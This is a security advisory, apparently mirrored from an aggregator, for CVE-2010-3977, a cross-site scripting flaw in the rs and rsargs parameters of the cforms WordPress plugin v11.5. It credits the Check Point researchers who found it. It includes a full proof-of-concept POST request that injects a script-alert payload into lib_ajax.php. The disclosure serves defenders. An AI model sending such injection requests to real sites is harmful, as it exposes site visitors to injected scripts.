cforms WordPress Plugin Cross Site Scripting

🗓️ 02 Nov 2010 00:00:00Reported by Rodrigo Rubira BrancoType

packetstorm🔗 packetstormsecurity.com👁 51 Views

cforms WordPress Plugin XSS Vulnerability in v11.

Reporter	Title	Published	Views	Family All 17
Tenable Nessus	cformsII Plugin for WordPress 'rs' Parameter XSS	8 Nov 201000:00	–	nessus
Circl	CVE-2010-3977	1 Nov 201000:00	–	circl
Check Point Advisories	Preemptive Protection against WordPress cforms Plugin Cross-Site Scripting (XSS) Vulnerability	14 Nov 201000:00	–	checkpoint_advisories
CVE	CVE-2010-3977	3 Nov 201001:00	–	cve
Cvelist	CVE-2010-3977	3 Nov 201001:00	–	cvelist
EUVD	EUVD-2010-3954	7 Oct 202500:30	–	euvd
Japan Vulnerability Notes	JVN#35256978: cforms II vulnerable to cross-site scripting	15 Feb 201200:00	–	jvn
Japan Vulnerability Notes	cforms II vulnerable to cross-site scripting	15 Feb 201208:14	–	jvn
myhack58	WordPress cformsII plugin rs and rsargs parameters to a script injection vulnerability and fix-vulnerability warning-the black bar safety net	8 Nov 201000:00	–	myhack58
NVD	CVE-2010-3977	3 Nov 201013:37	–	nvd

`Check Point Software Technologies - Vulnerability Discovery Team (VDT)  
http://www.checkpoint.com/defense/  
  
cforms WordPress Plugin Cross Site Scripting Vulnerability  
CVE-2010-3977  
  
  
INTRODUCTION  
  
According to Delicious Days, "cforms is a powerful and feature rich form plugin for WordPress, offering convenient deployment of multiple Ajax   
driven contact forms throughout your blog or even on the same page."  
  
This problem was confirmed in the following versions of the cforms WordPress Plugin, other versions   
maybe also affected.  
  
cforms v11.5  
  
  
CVSS Scoring System  
  
The CVSS score is: 5.5  
Base Score: 6.7  
Temporal Score: 5.5  
We used the following values to calculate the scores:  
Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N  
Temporal score is: E:F/RL:OF/RC:C  
  
  
DETAILS  
  
A data array is created in lib_ajax.php using values from a form field in a POST request. The parameters rs and rsargs are not validated and thus  
it is possible to inject code.  
  
Request:  
http://<server>/wp-content/plugins/cforms/lib_ajax.php  
POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1  
Host: <server>  
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:  
1.9.2.10) Gecko/20100914 Firefox/3.6.10  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 115  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Content-Length: 219  
Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do  
%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce  
%26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do  
%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;  
c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t ;  
comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam  
%40checkpoint.com  
Pragma: no-cache  
Cache-Control: no-cache  
rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#  
$<script>alert(1)</script>$#[email protected]$#$http://  
www.checkpoint.com$#$<script>alert(1)</script>  
  
  
  
CREDITS  
  
This vulnerability has been brought to our attention by Wagner Elias from Conviso IT Security company (http://www.conviso.com.br) and researched internally by Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT).  
  
  
`

02 Nov 2010 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.0079